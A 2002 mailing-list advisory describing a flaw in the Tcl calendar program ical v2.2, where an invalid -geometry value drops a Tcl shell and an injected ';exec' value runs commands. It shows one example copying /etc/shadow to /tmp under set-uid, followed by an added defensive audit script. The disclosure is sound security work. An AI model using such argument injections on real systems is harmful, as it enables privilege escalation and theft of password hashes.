Issues with ical

From: Chris (amrosat_private)
Date: Sat Mar 23 2002 - 11:55:54 PST

    note: this post is about the ical program (ical v2.2) released by Sanjay 
          Ghemawat, which is a calendar application. Please do not confuse 
          this with iPlanet's iCal server.
    
    ical is a program written in tcl. It seems that when executing the program
    with the -geometry option and an invalid value for geometry set, it drops
    a shell where the program was executed. The shell which is executed is 
    the tclsh (TCL Shell). The following is an example of this problem:
    
    [20:16] / $ ical -geometry invalidvalue
    Application initialization failed: bad geometry specifier "invalidvalue"
    % id
    uid=500(orion) gid=500(orion) groups=500(orion)
    %
    
    By default ical has the following permissions set:
    
    -rwxr-xr-x    1 root     root       276216 Jul 31  2001 /usr/bin/ical-2.2
    
    I decided to set the program setuid to see if the shell was executed after 
    program completion as my user, or before program completion as root user.
    When I executed the program again in the same manner as I did before, I 
    got the following:
    
    [20:16] / $ ical -geometry invalidvalue
    Application initialization failed: bad geometry specifier "invalidvalue"
    % id
    uid=500(orion) gid=500(orion) euid=0(root) groups=500(orion)
    %
    
    It seems to me that the uid which the program is using at this time 
    is used to execute the shell.
    
    Since by default the program is not set-uid it is not much of a security
    issue although it seems strange to me that it would drop a shell. 
    
    Sidenote: when using -geometry ";exec <whatever>" you are able to execute
              commands and the like. Next to "exec" other tcl shell commands 
              such as "catch" and "set" can be used to manipulate variables.
              A quick example of this is (we're still set-uid here):
              
              [20:33] / $ ls -ail /tmp/shadowfile 
              ls: /tmp/shadowfile: No such file or directory
              [20:33] / $ cat /etc/shadow
              cat: /etc/shadow: Permission denied
              [20:33] / $ ical -geometry ";exec cat /etc/shadow >> /tmp/shadowfile"
              [20:33] / $ ls -ail /tmp/shadowfile
              277828 -rw-rw-r--    1 root     orion         969 Aug 18 20:33 /tmp/shadowfile
    
    
    The above was based on tcl v8.3 and ical v2.2.
    
    Possibly other tcl-based programs may have the same issue,
    allowing an attacker to gain root access.
    
    Sorry if this issue has been posted before, just trying to find out if someone knows
    of similar issues or not.
    
    Cheers,
    
    Chris.
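
An added check, not part of the original post: the post shows the Tcl shell running with the program's effective uid and suspects other Tcl-based programs behave the same way, so this script lists set-uid/set-gid files under a directory that look Tcl-based. The function names and the detection heuristics (an interpreter line naming tclsh or wish, or embedded libtcl/libtk/Tcl_Init strings) are assumptions of this example.

```shell
#!/bin/sh
# Added example: find set-uid / set-gid files that appear to be Tcl/Tk programs.
# Heuristics are assumptions of this example, not taken from the post:
#   scripts  - "#!" line or "exec ..." re-exec idiom naming tclsh or wish
#   binaries - contain the strings libtcl, libtk or Tcl_Init

# is_tcl_based FILE -> exit status 0 if FILE looks like a Tcl/Tk program
is_tcl_based() {
    # Check the first lines for an interpreter line or the common
    # 'exec wish "$0" "$@"' idiom used by sh-wrapped Tcl scripts.
    if head -n 5 "$1" 2>/dev/null |
        LC_ALL=C grep -aqE '^(#!.*|[[:space:]]*exec[[:space:]].*)(tclsh|wish)'; then
        return 0
    fi
    # Otherwise treat it as a binary and look for Tcl/Tk library references.
    LC_ALL=C grep -aqE 'libtcl|libtk|Tcl_Init' "$1" 2>/dev/null
}

# audit_setid_tcl DIR -> prints one path per line for every regular file
# under DIR that has the set-uid or set-gid bit and looks Tcl-based.
audit_setid_tcl() {
    find "${1:-/usr/bin}" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        2>/dev/null |
    while IFS= read -r f; do
        if is_tcl_based "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Typical use (run by an administrator):
#   audit_setid_tcl /usr/bin
#   audit_setid_tcl /usr/local
```

Any path it prints is a candidate for having its set-uid or set-gid bit removed, or for a closer look at how it handles a failed Tk initialization.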
    


